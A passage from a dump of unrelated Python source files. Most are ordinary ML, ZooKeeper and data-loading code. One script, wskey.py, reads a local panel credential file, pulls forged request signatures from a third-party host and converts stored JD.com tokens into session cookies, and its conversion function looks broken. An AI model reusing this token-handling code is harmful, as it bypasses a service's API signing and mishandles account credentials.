matrix\npd.crosstab(test['species'],output_RF_t,rownames=['Actual Species'],colnames=['Predicted Species'])\n\n#* Adding column with random forest results\ncompare['RandForest']=iris.target_names[clf.predict(compare[features])]\n\n#* Getting estimator for the graph \nestimator = clf.estimators_[5]\n\n\n#* Export as dot file\nexport_graphviz(estimator, out_file='tree.dot', \n feature_names = [iris.feature_names[0],iris.feature_names[2]],\n class_names = iris.target_names[:2],\n rounded = True, proportion = False, \n precision = 2, filled = True)\n\n(graph,) = pydot.graph_from_dot_file('tree.dot')\ngraph.write_png('tree.png')\n\n#* Display in jupyter notebook\nimg = mpimg.imread('tree.png')\n\noutput_RF=(pd.factorize(compare['RandForest']))[0]\n\n\n\n#! Logistic Regression\n\n#! Data\n\n#* Samples number\nn=len(data)\n#* Labels\nh=n//2\ndimen=2\n\n#* Splitting the data in inputs (x) and outputs (y)\nx=torch.from_numpy(data).float().requires_grad_(True)\ny=(torch.from_numpy((pd.factorize(df['species']))[0]).view(len(data),1)).float()\n\n#! Model\n\n#* Building the model\nmodel= nn.Sequential(nn.Linear(2,1), nn.Sigmoid())\n\n#* Loss function and optimizer method\nloss_function= nn.BCELoss()\noptimizer=optim.Adam(model.parameters(),lr=0.025)\n\n#! 
Training loop\n\nlosses=[]\niterations=400\n\nfor i in tqdm(range(iterations)):\n \n result=model(x)\n loss=loss_function(result,y)\n \n losses.append(loss.data)\n\n optimizer.zero_grad()\n \n loss.backward()\n \n optimizer.step()\n\n#* Passing data through the model\nprediction=model(x)\n\n#* List with the corresponding labels\nprediction=['purple' if prediction[i] < 0.5 else 'yellow' for i in range(len(prediction))]\n\n#* weights\nw = list(model.parameters())\n\nw0 = w[0].data.numpy()\n\n#! Visualization\n\n#* Parameters to plot the line\nx_axis = np.linspace(np.min(data[:,0]), np.max(data[:,0]), len(x))\ny_axis = -(w[1].data.numpy() + x_axis*w0[0][0]) / w0[0][1]\n \n#* Font format \nfont = {'family': 'serif',\n 'color': 'darkred',\n 'weight': 'normal',\n 'size': 8,\n }\n\n#! FINAL PLOTTING\n\n#* Plotting\nfig, axs = plt.subplots(2,4, constrained_layout=True)\nfig.suptitle('Comparing classification methods', fontsize=30)\nfig.set_size_inches(16, 8)\n\naxs[0][0].scatter(data[:,0],data[:,1],c='green',alpha=0.6,s=65)\naxs[0][0].set_title('Dataset')\n\naxs[0][1].scatter(data[:,0],data[:,1],alpha=0.6,s=65,c=pd.factorize(df['species'])[0])\naxs[0][1].set_title('Dataset wiht outputs')\n\n\naxs[0][2].plot(range(1, 5),score)\naxs[0][2].set_xlabel('Number of Clusters')\naxs[0][2].set_ylabel('Score')\naxs[0][2].set_title('Elbow Curve')\n\naxs[0][3].scatter(data[:,0],data[:,1],c=output_km,alpha=0.6,s=65)\naxs[0][3].scatter([km.cluster_centers_[0][0],km.cluster_centers_[1][0]],[km.cluster_centers_[0][1],km.cluster_centers_[1][1]],marker=\"X\",s=150,c='red')\naxs[0][3].set_title('K means')\n\naxs[1][0].imshow(img)\naxs[1][0].set_title('Random Forest')\naxs[1][0].axis('off')\n\naxs[1][1].scatter(data[:,0],data[:,1],c=output_RF,alpha=0.6,s=65)\naxs[1][1].set_title('Random Forest Classifier')\n\naxs[1][2].plot(range(iterations),losses)\naxs[1][2].set_title('Loss')\n\naxs[1][3].plot(x_axis, y_axis,'g--') \nfor i in range(len(x)):\n axs[1][3].scatter(x[i,0].data, x[i,1].data,s=55,alpha=0.7,c=prediction[i])\naxs[1][3].set_title('Logistic Regression')\n\nplt.show()","sub_path":"Classifiers/05-ComparedClassifiers.py","file_name":"05-ComparedClassifiers.py","file_ext":"py","file_size_in_byte":6550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"270257446","text":"import time\nfrom kazoo.client import KazooClient\nfrom kazoo.client import KazooState\n\n\ndef my_listener(state):\n if state == KazooState.LOST:\n # Register somewhere that the session was lost\n print('zhr test: lost')\n elif state == KazooState.SUSPENDED:\n # Handle being disconnected from Zookeeper\n print('zhr test: suspended')\n else:\n # Handle being connected/reconnected to Zookeeper\n print('zhr test: connected/reconnected')\n\n\nif __name__ == '__main__':\n zk = KazooClient(hosts='localhost:2181')\n zk.add_listener(my_listener)\n zk.start()\n\n @zk.ChildrenWatch('/my/favorite/node')\n def watch_children(children):\n print('Children are now: %s' % children)\n\n @zk.DataWatch('/my/favorite/node')\n def watch_node(data, stat):\n print(data)\n print(stat)\n print('Version: %s, data: %s' % (stat.version, data.decode('utf-8')))\n\n def my_func(event):\n print('in my_func')\n print(event)\n node_type = event.type\n state = event.state\n print('type: {}, state: {}'.format(node_type, state))\n path = event.path\n print(zk.get(path))\n\n node = zk.get('/my/favorite/node', watch=my_func)\n children = zk.get_children('/my/favorite/node', watch=my_func)\n\n while True:\n 
time.sleep(1)\n","sub_path":"python/third_part_tools/kazoo/test/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"313786202","text":"import partikkel\nimport matplotlib.pyplot as plt\n\nm_e = 9.11E-31\nhbar = 1.055E-34\nk0 = 1.0E8\nV0 = 3*hbar**2 * k0**2 / m_e\ndx = 1.0E-10\nsigma = 100*dx\n\np1 = partikkel.Partikkel(m_e, k0, dx, 0, 400, sigma, x_offset=0)\np1.calculate(1.0E-13, 900)\n\nplt.figure(1)\nplt.title(r\"Usikkerhet i posisjon\")\n","sub_path":"oppg1.py","file_name":"oppg1.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"586870191","text":"# 在这里输入青龙面板用户名密码,如果不填写,就自动从auth.json中读取\nusername = \"\"\npassword = \"\"\n\nimport requests\nimport time\nimport json\nimport re\nfrom urllib.parse import urlencode\n\nrequests.packages.urllib3.disable_warnings()\n\ntoken = \"\"\nif username == \"\" or password == \"\":\n f = open(\"/ql/config/auth.json\")\n auth = f.read()\n auth = json.loads(auth)\n username = auth[\"username\"]\n password = auth[\"password\"]\n token = auth[\"token\"]\n f.close()\n\n\ndef gettimestamp():\n return str(int(time.time() * 1000))\n\n\ndef login(username, password):\n url = \"http://127.0.0.1:5700/api/login?t=%s\" % gettimestamp()\n data = {\"username\": username, \"password\": password}\n r = s.post(url, data)\n s.headers.update({\"authorization\": \"Bearer \" + json.loads(r.text)[\"data\"][\"token\"]})\n\n\ndef getitem(searchValue):\n url = \"http://127.0.0.1:5700/api/envs?searchValue=%s&t=%s\" % (searchValue, gettimestamp())\n r = s.get(url)\n item = json.loads(r.text)[\"data\"]\n return item\n\n\ndef getckitem(searchValue, value):\n url = \"http://127.0.0.1:5700/api/envs?searchValue=%s&t=%s\" % (searchValue, gettimestamp())\n r = s.get(url)\n for i in json.loads(r.text)[\"data\"]:\n if value in i[\"value\"]:\n return i\n return []\n\n\ndef getsign():\n url = \"https://hellodns.coding.net/p/sign/d/jsign/git/raw/master/sign\"\n r = s.get(url, verify=False)\n data = \"&uuid=\" + json.loads(r.text)[\"uuid\"] + \"&st=\" + json.loads(r.text)[\"st\"] + \"&sign=\" + json.loads(r.text)[\"sign\"] + \"&sv=\" + json.loads(r.text)[\"sv\"]\n return data\n\n\ndef wstopt(cookies):\n headers = {\n 'user-agent': 'okhttp/3.12.1;jdmall;android;version/;build/0;screen/1080x1920;os/5.1.1;network/wifi;',\n 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Cookie': cookies,\n }\n url = 'https://api.m.jd.com/client.action?functionId=genToken&clientVersion=10.1.2&build=89743&client=android&d_brand=OPPO&d_model=PCRT00&osVersion=5.1.1&screen=1920*1080&partner=lc023&oaid=&eid=eidAe81b812187s36z8QOkxpRJWzMceSvZJ6Ges/EbXnbK3TBxc/JEcutXxuELIRMJDVeTNJFcAF/+tx1qw9GllLTdSnFeV3ic6909a697SbDL9zxEc4&sdkVersion=22&lang=zh_CN&aid=21e9fa9db1e4e15d&area=19_1601_3633_63257&networkType=wifi&wifiBssid=unknown&uts=0f31TVRjBSsqndu4%2FjgUPz6uymy50MQJw%2B3mGtYmx2hY8nVZkXFqGJ2D3wO8rvc%2BnAbe881zrDZjz3yU3z8vQgL8NZ7e39M3H2YpLER13q%2B3VUzHQXXLg4BMmeH%2B1W0%2BxQY%2FL%2FR4Y58JMW9A9F9yD2BtQPynkeKYtBsYDCkOn35Tv9ci57mPbqxYWU0TDVJ8t7JBXRhLckTorzxtEAVucA%3D%3D&uemps=0-0&harmonyOs=0' + getsign()\n body = 'body=%7B%22action%22%3A%22to%22%2C%22to%22%3A%22https%253A%252F%252Fplogin.m.jd.com%252Fcgi-bin%252Fm%252Fthirdapp_auth_page%253Ftoken%253DAAEAIEijIw6wxF2s3bNKF0bmGsI8xfw6hkQT6Ui2QVP7z1Xg%2526client_type%253Dandroid%2526appid%253D879%2526appup_type%253D1%22%7D&'\n response 
= requests.post(url, data=body, headers=headers, verify=False)\n data = json.loads(response.text)\n if data.get('code') != '0':\n return None\n tokenKey = data.get('tokenKey')\n url = data.get('url')\n session = requests.session()\n params = {\n 'tokenKey': tokenKey,\n 'to': 'https://plogin.m.jd.com/jd-mlogin/static/html/appjmp_blank.html'\n }\n url += '?' + urlencode(params)\n session.get(url, allow_redirects=True)\n result = \"\"\n for k, v in cookies.items():\n if k == 'pt_key' or k == 'pt_pin':\n result += k + \"=\" + v + \"; \"\n if result[0:15] == 'pt_key=app_open':\n return result\n else:\n return 'error'\n\n\ndef checkcookie(cookies):\n url = 'https://api.m.jd.com/client.action?functionId=newUserInfo&clientVersion=10.0.9&client=android&openudid=a27b83d3d1dba1cc&uuid=a27b83d3d1dba1cc&aid=a27b83d3d1dba1cc&area=19_1601_36953_50397&st=1626848394828&sign=447ffd52c08f0c8cca47ebce71579283&sv=101&body=%7B%22flag%22%3A%22nickname%22%2C%22fromSource%22%3A1%2C%22sourceLevel%22%3A1%7D&'\n headers = {\n 'user-agent': 'okhttp/3.12.1;jdmall;android;version/;build/0;screen/1080x1920;os/5.1.1;network/wifi;',\n 'Cookie': cookies,\n }\n response = requests.post(url=url, headers=headers, verify=False)\n data = response.json()\n if data['code'] == '0':\n return False\n else:\n return True\n\n\ndef update(text, qlid):\n url = \"http://127.0.0.1:5700/api/envs?t=%s\" % gettimestamp()\n s.headers.update({\"Content-Type\": \"application/json;charset=UTF-8\"})\n data = {\n \"name\": \"JD_COOKIE\",\n \"value\": text,\n \"_id\": qlid\n }\n r = s.put(url, data=json.dumps(data))\n if json.loads(r.text)[\"code\"] == 200:\n return True\n else:\n return False\n\n\ndef insert(text):\n url = \"http://127.0.0.1:5700/api/envs?t=%s\" % gettimestamp()\n s.headers.update({\"Content-Type\": \"application/json;charset=UTF-8\"})\n data = []\n data_json = {\n \"value\": text,\n \"name\": \"JD_COOKIE\"\n }\n data.append(data_json)\n r = s.post(url, json.dumps(data))\n if json.loads(r.text)[\"code\"] == 200:\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n s = requests.session()\n if token == \"\":\n login(username, password)\n else:\n s.headers.update({\"authorization\": \"Bearer \" + token})\n count = 0\n wskeys = getitem(\"JD_WSCK\")\n for i in wskeys:\n count += 1\n wspin = re.findall(r\"pin=(.*?);\", i[\"value\"])[0]\n if i[\"status\"] == 0:\n item = getckitem(\"JD_COOKIE\", \"pt_pin=\" + wspin)\n if item != []:\n if checkcookie(item[\"value\"]):\n ptck = wstopt(i[\"value\"])\n if ptck == \"error\":\n print(\"第%s个wskey转换失败, pin:%s\" % (count, wspin))\n else:\n if update(ptck, item[\"_id\"]):\n print(\"第%s个wskey更新成功, pin:%s\" % (count, wspin))\n else:\n print(\"第%s个wskey更新失败, pin:%s\" % (count, wspin))\n else:\n print(\"第%s个wskey无需更新, pin:%s\" % (count, wspin))\n else:\n ptck = wstopt(i[\"value\"])\n if ptck == \"error\":\n print(\"第%s个wskey转换失败, pin:%s\" % (count, wspin))\n else:\n if insert(ptck):\n print(\"第%s个wskey添加成功, pin:%s\" % (count, wspin))\n else:\n print(\"第%s个wskey添加失败, pin:%s\" % (count, wspin))\n else:\n print(\"第%s个wskey已禁用, pin:%s\" % (count, wspin))\n","sub_path":"wskey.py","file_name":"wskey.py","file_ext":"py","file_size_in_byte":6580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"115396501","text":"\nimport argparse\n\n\nimport cmdline_plot\nimport cmdline_plotraster\nimport cmdline_compare\n\n\n\n\ndef build_argparser():\n\n parser = argparse.ArgumentParser(description='HDF-jive command-line tools')\n subparsers = 
parser.add_subparsers(help='sub-command help')\n cmdline_plot.build_subparser(subparsers)\n cmdline_plotraster.build_subparser(subparsers)\n cmdline_compare.build_subparser(subparsers)\n return parser\n\n\ndef main():\n parser = build_argparser()\n args = parser.parse_args()\n\n # Run the subcommand:\n args.func(args)\n \n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/src/hdfjive/cmdline/cmdline.py","file_name":"cmdline.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"644556560","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 25 12:25:29 2018\n\n@author: sahith\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport math\nfrom sklearn.metrics import adjusted_rand_score\nfrom sklearn.metrics import fowlkes_mallows_score\n\n\ndef logLikelihood(data, mean, covariance, lambda1, k, m): # Log Likelihood \n\n log = 0\n for i in range(len(data)):\n sum1 = 0\n for j in range(k):\n sum1 += lambda1[j] * guassian(data[i], mean[j], covariance[j], m)\n log += np.log(sum1)\n return log\n\ndef gmmPred(data, mean, covariance, lambda1, k, m):\n pred = []\n for i in range(len(data)):\n best_likelihood = None\n best_cluster = None\n for j in range(k):\n likelihood = lambda1[j] * guassian(data[i], mean[j], covariance[j], m)\n if best_likelihood is None or best_likelihood <= likelihood:\n best_likelihood = likelihood\n best_cluster = j\n pred.append(best_cluster)\n return pred\n\ndef preprocessData(data): #Preprocessing Data\n rows, cols = data.shape\n for i in range(cols):\n mean = np.mean(data[:, i])\n std = np.std(data[:, i])\n data[:, i] = (data[:, i]-mean)/std\n return data\n\ndef guassian(row, mean, covariance, m): # Multivariate Gaussian\n diff_data_mean = np.array(row - mean).reshape(1, m)\n exp = np.exp(-0.5 * np.dot(np.dot(diff_data_mean, np.linalg.inv(covariance)), diff_data_mean.T))\n return (1 / np.sqrt(((2 * math.pi) ** m) * np.linalg.det(covariance))) * exp\n\n\ntrain_data = np.array(pd.read_csv('leaf.data',header = None)) #Train data\ntrainLength = len(train_data)\ntrain_features = train_data[:, 0]\ntrain_data = train_data[:, 1:]\ncols = len(train_data[0])\nscaledData = preprocessData(train_data) #Scaling data\n\nkArray = [12, 18, 24, 36, 42] # K array\n\n# Get GMM objective loss array and compute mean and variance\nlossArray = []\n\nmeanArray = []\ncovarianceArray = []\nlambdaArray = []\n# For each K\nfor k in kArray:\n print('K-value',k)\n for i in range(20): #20 random Intializations\n print(\"Iter\",i)\n centers = np.empty((k, cols), dtype=np.float64)\n for j in range(k):\n centers[j] = np.array(np.random.choice(np.arange(-3, 4, 1), cols)).reshape(1, cols)\n cov_matrix_arr = np.empty((k, cols, cols))\n for j in range(k):\n cov_matrix_arr[j] = np.identity(n=cols, dtype=np.float64)\n\n lambda_arr = np.empty((k, 1), dtype=np.float64)\n for j in range(k):\n lambda_arr[j] = 1/k\n\n logLikelihoodVal = logLikelihood(scaledData, centers, cov_matrix_arr, lambda_arr, k, cols)\n iteration_counter = 1\n while True:\n #E Step\n q_array = np.empty((trainLength, k), dtype=np.float64)\n for x in range(trainLength):\n den_sum = 0\n for k_val in range(k):\n q_array[x, k_val] = lambda_arr[k_val] * guassian(scaledData[x], centers[k_val], cov_matrix_arr[k_val], cols)\n den_sum += q_array[x, k_val]\n\n q_array[x] = q_array[x] / den_sum\n #M Step\n for k_val in range(k):\n num_total = 0\n den_total = 0\n for m in range(trainLength):\n num_total += 
q_array[m, k_val] * scaledData[m]\n den_total += q_array[m, k_val]\n centers[k_val] = num_total / den_total\n\n for k_val in range(k):\n num_total = 0.0\n den_total = 0.0\n\n for m in range(trainLength):\n diff_vector = scaledData[m] - centers[k_val]\n diff_vector = np.array(diff_vector).reshape((1, cols))\n num_total += q_array[m, k_val] * np.dot(diff_vector.T, diff_vector)\n den_total += q_array[m, k_val]\n cov_matrix_arr[k_val] = num_total / den_total\n cov_matrix_arr[k_val] += np.identity(n=cols)\n\n for k_val in range(k):\n num_total = 0\n for m in range(trainLength):\n num_total += q_array[m, k_val]\n\n lambda_arr[k_val] = num_total / trainLength\n\n prevLog = logLikelihoodVal\n logLikelihoodVal = logLikelihood(scaledData, centers, cov_matrix_arr, lambda_arr, k, cols)\n if prevLog >= logLikelihoodVal: # Convergence Check\n lossArray.append(logLikelihoodVal)\n meanArray.append(centers)\n covarianceArray.append(cov_matrix_arr)\n lambdaArray.append(lambda_arr)\n break\n\nindex = 0 # Mean and variance of GMM objective \nwhile index < 5:\n k = index * 20\n print(\"The mean and Variance of the GMM Objective for k =\",kArray[index],\"is\", np.mean(lossArray[k:k+20]), \"and:\", np.var(lossArray[k:k+20]))\n index += 1\n\n\"\"\"\nUsing 2 metrics to compare clusters against true labels \n\"\"\"\nadjRand = 0\nfms = 0\ntemp_data = np.append(scaledData, np.array(train_features - 1).reshape((trainLength, 1)), axis=1)\nfor i in range(20):\n predict_array = gmmPred(scaledData, meanArray[60+i], covarianceArray[60+i], lambdaArray[60+i], 36, cols)\n adjRand += adjusted_rand_score(train_features, predict_array) #Adjusted Rand Score (train_features holds the true class labels)\n fms += fowlkes_mallows_score(train_features, predict_array) #Fowlkes Mallows Score\n\nprint(\"Adjusted Rand Index of the GMM model with k: 36 is\", adjRand/20)\nprint(\"Fowlkes Mallows Score of the GMM model with k: 36 is\", fms/20)\n","sub_path":"Mixture Models/GMM.py","file_name":"GMM.py","file_ext":"py","file_size_in_byte":5540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"212110787","text":"import numpy as np\nimport pandas as pd\n\n\ndef add_noise(data, num_features=5, seed=1):\n num_obs = data.shape[0]\n np.random.seed(seed)\n funcs = [np.random.rand, np.random.randn]\n noise = {'noise_' + str(n): np.random.choice(funcs)(num_obs)\n for n in range(num_features)}\n\n if isinstance(data, pd.DataFrame):\n df_noise = pd.DataFrame(noise, index=data.index)\n return pd.concat([data, df_noise], axis=1)\n\n if isinstance(data, np.ndarray):\n raise NotImplementedError\n","sub_path":"eda_tools/data_tools.py","file_name":"data_tools.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"14395374","text":"import sys\n\nsys.path.append(\"tsai.jedi\")\n# from __future__ import print_function\nimport torch\nfrom torchvision import datasets, transforms\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport pickle\nfrom PIL import Image\nfrom torch.utils.data import Dataset, DataLoader\nfrom datatransforms import train_transform_alb, test_transform_alb, train_transform_s11, train_transform_tinyimagenet, \\\n test_transform_tinyimagenet\nimport config\nimport time\nimport cv2\nimport PIL\nimport sklearn\n\ntorch.manual_seed(1)\nkwargs = {'num_workers': config.num_workers, 'pin_memory': config.pin_memory} if config.use_cuda else {}\n\n# MNIST\ntrain_loader_MNIST = torch.utils.data.DataLoader(\n 
datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.RandomRotation((-8.0, 8.0), fill=(1,)),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=config.batch_size, shuffle=True, **kwargs)\ntest_loader_MNIST = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=config.batch_size, shuffle=True, **kwargs)\n# CIFAR10\ntrain_loader_CIFAR10 = torch.utils.data.DataLoader(\n datasets.CIFAR10('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation((-8.0, 8.0)),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n ])),\n batch_size=config.batch_size, shuffle=True, **kwargs)\ntest_loader_CIFAR10 = torch.utils.data.DataLoader(\n datasets.CIFAR10('../data', train=False, transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n ])),\n batch_size=config.batch_size, shuffle=True, **kwargs)\n\n# CIFAR-10 Albumentation\ndatasets.CIFAR10('../data', train=True, download=True)\n\n\ndef load_cifar10_data(filename):\n with open('../data/cifar-10-batches-py/' + filename, 'rb') as file:\n batch = pickle.load(file, encoding='latin1')\n\n features = batch['data']\n labels = batch['labels']\n return features, labels\n\n\nbatch_1, labels_1 = load_cifar10_data('data_batch_1')\nbatch_2, labels_2 = load_cifar10_data('data_batch_2')\nbatch_3, labels_3 = load_cifar10_data('data_batch_3')\nbatch_4, labels_4 = load_cifar10_data('data_batch_4')\nbatch_5, labels_5 = load_cifar10_data('data_batch_5')\n\ntest, label_test = load_cifar10_data('test_batch')\n\nX_train = np.concatenate([batch_1, batch_2, batch_3, batch_4, batch_5], 0)\nY_train = np.concatenate([labels_1, labels_2, labels_3, labels_4, labels_5], 0)\n\n\ndef return_photo(batch_file):\n assert batch_file.shape[1] == 3072\n dim = np.sqrt(1024).astype(int)\n r = batch_file[:, 0:1024].reshape(batch_file.shape[0], dim, dim, 1)\n g = batch_file[:, 1024:2048].reshape(batch_file.shape[0], dim, dim, 1)\n b = batch_file[:, 2048:3072].reshape(batch_file.shape[0], dim, dim, 1)\n photo = np.concatenate([r, g, b], -1)\n return photo\n\n\nX_train = return_photo(X_train)\nX_test = return_photo(test)\nY_test = np.array(label_test)\n\nclasses_CIFAR10 = ('plane', 'car', 'bird', 'cat',\n 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')\n\ntrainset = train_transform_alb(image_list=X_train, label=Y_train)\ntestset = test_transform_alb(image_list=X_test, label=Y_test)\ntrainset_s11 = train_transform_s11(image_list=X_train, label=Y_train)\n\ntrain_loader_CIFAR10_alb = torch.utils.data.DataLoader(trainset,\n batch_size=config.batch_size, shuffle=True, **kwargs)\n\ntest_loader_CIFAR10_alb = torch.utils.data.DataLoader(testset,\n batch_size=config.batch_size, shuffle=True, **kwargs)\n\ntrain_loader_CIFAR10_s11 = torch.utils.data.DataLoader(trainset_s11,\n batch_size=config.batch_size, shuffle=True, **kwargs)\n\n\n###TinyImagenet\n\ndef get_id_dictionary(path):\n id_dict = {}\n for i, line in enumerate(open(path + 'wnids.txt', 'r')):\n id_dict[line.replace('\\n', '')] = i\n return id_dict\n\n\ndef get_class_to_id_dict(path):\n id_dict = get_id_dictionary()\n all_classes = {}\n result = {}\n for i, line in enumerate(open(path + 
'words.txt', 'r')):\n n_id, word = line.replace('\\n', '').split('\\t')[:2]\n all_classes[n_id] = word\n for key, value in id_dict.items():\n result[value] = (key, all_classes[key])\n return result\n\n\ndef get_data(id_dict, path):\n print('starting loading data')\n train_data, test_data = [], []\n train_labels, test_labels = [], []\n t = time.time()\n for key, value in id_dict.items():\n train_data += [cv2.imread(path + 'train/{}/images/{}_{}.JPEG'.format(key, key, str(i))) for i in range(500)]\n train_labels_ = np.array([[0] * 200] * 500)\n train_labels_[:, value] = 1\n train_labels += train_labels_.tolist()\n\n for line in open(path + 'val/val_annotations.txt'):\n img_name, class_id = line.split('\\t')[:2]\n test_data.append(cv2.imread(path + 'val/images/{}'.format(img_name)))\n test_labels_ = np.array([[0] * 200])\n test_labels_[0, id_dict[class_id]] = 1\n test_labels += test_labels_.tolist()\n\n print('finished loading data, in {} seconds'.format(time.time() - t))\n return np.array(train_data), np.array(train_labels), np.array(test_data), np.array(test_labels)\n\n\ntrain_data, train_labels, test_data, test_labels = get_data(get_id_dictionary(path=config.imagenet_path),\n path=config.imagenet_path)\n\ntotal_data = np.concatenate((train_data, test_data), axis=0)\ntotal_labels = np.concatenate((train_labels, test_labels), axis=0)\n\nfrom sklearn.model_selection import train_test_split\n\ntrain_data, test_data, train_labels, test_labels = train_test_split(total_data, total_labels, test_size=0.30,\n random_state=42)\n\ntrain_labels = train_labels.argmax(axis=1)\ntest_labels = test_labels.argmax(axis=1)\n\ntrainset = train_transform_tinyimagenet(image_list=train_data, label=train_labels)\ntrain_loader_tinyimgnet_s12 = torch.utils.data.DataLoader(trainset,\n batch_size=config.batch_size, shuffle=True, **kwargs)\ntestset = test_transform_tinyimagenet(image_list=test_data, label=test_labels)\ntest_loader_tinyimgnet_s12 = torch.utils.data.DataLoader(testset,\n batch_size=config.batch_size, shuffle=True, **kwargs)\n\ndel train_data, train_labels, test_data, test_labels, testset, trainset, total_labels, total_data\n","sub_path":"tsai.jedi/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":7152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"491056832","text":"# Good morning! 
Here's your coding interview problem for today.\n\n# This problem was asked by Google.\n\n# Given the root to a binary tree, implement serialize(root), which serializes the tree into a string, and deserialize(s), which deserializes the string back into the tree.\n\n# For example, given the following Node class\n\nclass Node:\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\ndef serialize(root):\n\tres = []\n\tq = [root]\n\twhile len(q) > 0:\n\t\tcurr = q.pop(0)\n\t\tif curr == None:\n\t\t\tres.append(\"*\")\n\t\telse:\n\t\t\tq.append(curr.left)\n\t\t\tq.append(curr.right)\n\t\t\tres.append(curr.val)\n\n\t# s = \"\"\n\t# for ele in res:\n\t# \ts += str(ele)\n\t# \ts += \",\"\n\t# print(s[:-1])\n\t# return s[:-1]\n\treturn res\n\n\ndef deserialize(s, num):\n\t# print(\"s: {}, num: {}\".format(s, num))\n\tif num+1 >= len(s):\n\t\treturn\n\tif s[num-1] == \"*\":\n\t\treturn\n\tl = 2*num\n\tr = 2*num + 1\n\treturn Node(s[num-1], deserialize(s, l), deserialize(s, r))\n\n\ndef main():\n\tn4 = Node(4)\n\tn3 = Node(3, n4)\n\tn2 = Node(2)\n\tn = Node(1, n2, n3)\n\tarr = serialize(n)\n\tnewn = deserialize(arr, 1)\n\ttemp = serialize(newn)\n\tprint(temp)\n\n\tnode = Node('root', Node('left', Node('left.left')), Node('right'))\n\tassert deserialize(serialize(node),1).left.left.val == 'left.left'\n\nif __name__ == '__main__':\n\tmain()","sub_path":"andylou2/07_09_2018.py","file_name":"07_09_2018.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"380387482","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow.python.ops import control_flow_ops\n\n\n# Code modified from the following repos/resources:\n# * https://github.com/ppliuboy/SelFlow/blob/master/data_augmentation.py\n# * https://www.wouterbulten.nl/blog/tech/data-augmentation-using-tensorflow-data-dataset/#code\n# * https://github.com/tensorflow/models/blob/master/research/slim/preprocessing/inception_preprocessing.py\n# All rights go to their rightful owner(s)\n\n\ndef apply_with_random_selector(x, func, num_cases):\n \"\"\"Computes func(x, sel), with sel sampled from [0...num_cases-1].\n Args:\n x: input Tensor.\n func: Python function to apply.\n num_cases: Python int32, number of cases to sample sel from.\n Returns:\n The result of func(x, sel), where func receives the value of the\n selector as a python integer, but sel is sampled dynamically.\n \"\"\"\n sel = tf.random_uniform([], maxval=num_cases, dtype=tf.int32)\n # Pass the real x only to one of the func calls.\n return control_flow_ops.merge([\n func(control_flow_ops.switch(x, tf.equal(sel, case))[1], case)\n for case in range(num_cases)])[0]\n\n\ndef distort_colour_zero(image, dist_params):\n image = tf.image.random_brightness(image, max_delta=dist_params['max_delta_brightness'] / 255.)\n image = tf.image.random_saturation(image, lower=dist_params['lower_saturation'],\n upper=dist_params['upper_saturation'])\n image = tf.image.random_hue(image, max_delta=dist_params['max_delta_hue'])\n image = tf.image.random_contrast(image, lower=dist_params['lower_contrast'], upper=dist_params['upper_contrast'])\n return image\n\n\ndef distort_colour_one(image, dist_params):\n image = tf.image.random_saturation(image, lower=dist_params['lower_saturation'],\n upper=dist_params['upper_saturation'])\n image = tf.image.random_brightness(image, max_delta=dist_params['max_delta_brightness'] / 255.)\n image = 
tf.image.random_contrast(image, lower=dist_params['lower_contrast'], upper=dist_params['upper_contrast'])\n image = tf.image.random_hue(image, max_delta=dist_params['max_delta_hue'])\n return image\n\n\ndef distort_colour_two(image, dist_params):\n image = tf.image.random_contrast(image, lower=dist_params['lower_contrast'], upper=dist_params['upper_contrast'])\n image = tf.image.random_hue(image, max_delta=dist_params['max_delta_hue'])\n image = tf.image.random_brightness(image, max_delta=dist_params['max_delta_brightness'] / 255.)\n image = tf.image.random_saturation(image, lower=dist_params['lower_saturation'],\n upper=dist_params['upper_saturation'])\n return image\n\n\ndef distort_colour_three(image, dist_params):\n image = tf.image.random_hue(image, max_delta=dist_params['max_delta_hue'])\n image = tf.image.random_saturation(image, lower=dist_params['lower_saturation'],\n upper=dist_params['upper_saturation'])\n image = tf.image.random_contrast(image, lower=dist_params['lower_contrast'], upper=dist_params['upper_contrast'])\n image = tf.image.random_brightness(image, max_delta=dist_params['max_delta_brightness'] / 255.)\n return image\n\n\n# We keep it as is as colour distortions can only 